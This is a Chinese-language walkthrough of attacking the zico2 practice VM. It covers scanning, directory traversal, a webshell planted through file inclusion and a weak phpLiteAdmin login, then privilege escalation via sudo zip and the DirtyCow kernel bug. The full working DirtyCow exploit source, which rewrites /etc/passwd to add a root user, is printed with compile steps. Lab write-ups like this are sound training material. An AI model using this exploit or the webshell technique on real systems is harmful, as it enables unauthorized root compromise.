一、靶机安装

靶机下载地址zico2: 1

下载后得到ova文件,用VMware打开

image-20240730155303118

导入虚拟机填一下虚拟机的名称和存储位置

image-20240730155910388

这里不知道为什么会失败,点击重试就行

image-20240730160026560

二、主机发现

1.使用arp-scan进行主机发现

这里其他地址都是我其他虚拟机的ip地址

image-20240730160254607

2.使用msf进行主机发现

前天刚看了看msf基础,想着也用着msf里面的exp模块进行一下主机发现

这里使用auxiliary/scanner/discovery/arp_sweep模块进行主机发现

使用set rhosts 192.168.72.1/24来设置目标网段

使用set rtheads 100来设置线程数

image-20240730160624144

使用run来开始扫描

image-20240730160938439

三、端口扫描

1.使用nmap进行端口扫描

image-20240730162219682

2.使用msf进行端口扫描

image-20240730162131120

在80端口上面开启了web服务

四、访问web页面

网页可以互的地方挺少的

image-20240730162331099

点击CHECK THEM OUT!跳转到了展示页面

image-20240730162610879

image-20240730162749782

看页面传参,推测有文件读取漏洞

利用目录穿越可以读取到/etc/passwd

image-20240730162935042

目录扫描

目录扫描的时候,发现了一处路径

image-20240730163206839

访问该路径

image-20240730163230912

image-20240730163251146

弱口令admin登录进去

image-20240730163553633

test_users数据库下面的info表中放着两组账号密码

1
2
root:34kroot34
zico: zico2215@

都是假的

image-20240730163906933

将此处地址,复制到view.php页面page参数后面

image-20240730163647939

页面改变,此处是文件包含漏洞

创建一个数据库。。。表名以一句话木马命名

image-20240730163825171

文件包含数据库1

image-20240730164132617

用蚁剑连接

image-20240730164202444

在home目录中的wordpress的配置文件中找到一组密码

image-20240730164316484

用那一组密码可以ssh连接上去

image-20240730164547493

五、提权

1.利用zip提权

该用户可以使用sudo使用zip

image-20240730165242847

通过zip进行提权

image-20240730165211719

2.脏牛提权

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
//
// This exploit uses the pokemon exploit of the dirtycow vulnerability
// as a base and automatically generates a new passwd line.
// The user will be prompted for the new password when the binary is run.
// The original /etc/passwd file is then backed up to /tmp/passwd.bak
// and overwrites the root account with the generated line.
// After running the exploit you should be able to login with the newly
// created user.
//
// To use this exploit modify the user values according to your needs.
// The default is "firefart".
//
// Original exploit (dirtycow's ptrace_pokedata "pokemon" method):
// https://github.com/dirtycow/dirtycow.github.io/blob/master/pokemon.c
//
// Compile with:
// gcc -pthread dirty.c -o dirty -lcrypt
//
// Then run the newly create binary by either doing:
// "./dirty" or "./dirty my-new-password"
//
// Afterwards, you can either "su firefart" or "ssh firefart@..."
//
// DON'T FORGET TO RESTORE YOUR /etc/passwd AFTER RUNNING THE EXPLOIT!
// mv /tmp/passwd.bak /etc/passwd
//
// Exploit adopted by Christian "FireFart" Mehlmauer
// https://firefart.at
//

#include <fcntl.h>
#include <pthread.h>
#include <string.h>
#include <stdio.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <sys/ptrace.h>
#include <stdlib.h>
#include <unistd.h>
#include <crypt.h>

const char *filename = "/etc/passwd";
const char *backup_filename = "/tmp/passwd.bak";
const char *salt = "firefart";

int f;
void *map;
pid_t pid;
pthread_t pth;
struct stat st;

struct Userinfo {
char *username;
char *hash;
int user_id;
int group_id;
char *info;
char *home_dir;
char *shell;
};

char *generate_password_hash(char *plaintext_pw) {
return crypt(plaintext_pw, salt);
}

char *generate_passwd_line(struct Userinfo u) {
const char *format = "%s:%s:%d:%d:%s:%s:%s\n";
int size = snprintf(NULL, 0, format, u.username, u.hash,
u.user_id, u.group_id, u.info, u.home_dir, u.shell);
char *ret = malloc(size + 1);
sprintf(ret, format, u.username, u.hash, u.user_id,
u.group_id, u.info, u.home_dir, u.shell);
return ret;
}

void *madviseThread(void *arg) {
int i, c = 0;
for(i = 0; i < 200000000; i++) {
c += madvise(map, 100, MADV_DONTNEED);
}
printf("madvise %d\n\n", c);
}

int copy_file(const char *from, const char *to) {
// check if target file already exists
if(access(to, F_OK) != -1) {
printf("File %s already exists! Please delete it and run again\n",
to);
return -1;
}

char ch;
FILE *source, *target;

source = fopen(from, "r");
if(source == NULL) {
return -1;
}
target = fopen(to, "w");
if(target == NULL) {
fclose(source);
return -1;
}

while((ch = fgetc(source)) != EOF) {
fputc(ch, target);
}

printf("%s successfully backed up to %s\n",
from, to);

fclose(source);
fclose(target);

return 0;
}

int main(int argc, char *argv[])
{
// backup file
int ret = copy_file(filename, backup_filename);
if (ret != 0) {
exit(ret);
}

struct Userinfo user;
// set values, change as needed
user.username = "firefart";
user.user_id = 0;
user.group_id = 0;
user.info = "pwned";
user.home_dir = "/root";
user.shell = "/bin/bash";

char *plaintext_pw;

if (argc >= 2) {
plaintext_pw = argv[1];
printf("Please enter the new password: %s\n", plaintext_pw);
} else {
plaintext_pw = getpass("Please enter the new password: ");
}

user.hash = generate_password_hash(plaintext_pw);
char *complete_passwd_line = generate_passwd_line(user);
printf("Complete line:\n%s\n", complete_passwd_line);

f = open(filename, O_RDONLY);
fstat(f, &st);
map = mmap(NULL,
st.st_size + sizeof(long),
PROT_READ,
MAP_PRIVATE,
f,
0);
printf("mmap: %lx\n",(unsigned long)map);
pid = fork();
if(pid) {
waitpid(pid, NULL, 0);
int u, i, o, c = 0;
int l=strlen(complete_passwd_line);
for(i = 0; i < 10000/l; i++) {
for(o = 0; o < l; o++) {
for(u = 0; u < 10000; u++) {
c += ptrace(PTRACE_POKETEXT,
pid,
map + o,
*((long*)(complete_passwd_line + o)));
}
}
}
printf("ptrace %d\n",c);
}
else {
pthread_create(&pth,
NULL,
madviseThread,
NULL);
ptrace(PTRACE_TRACEME);
kill(getpid(), SIGSTOP);
pthread_join(pth,NULL);
}

printf("Done! Check %s to see if the new user was created.\n", filename);
printf("You can log in with the username '%s' and the password '%s'.\n\n",
user.username, plaintext_pw);
printf("\nDON'T FORGET TO RESTORE! $ mv %s %s\n",
backup_filename, filename);
return 0;
}

上面的exp保存为.c文件然后编译

1
gcc -pthread c代码文件名 -o 输出文件名 -lcrypt

image-20240730170536050

运行生成的文件,会让我们输入新密码

image-20240730170704014

可以看到我们这里成功添加了一个firefart用户而且还是root权限

我们这里其实就是利用脏牛漏洞在etc/passwd中添加了一个root用户

image-20240730171122562

image-20240730171152332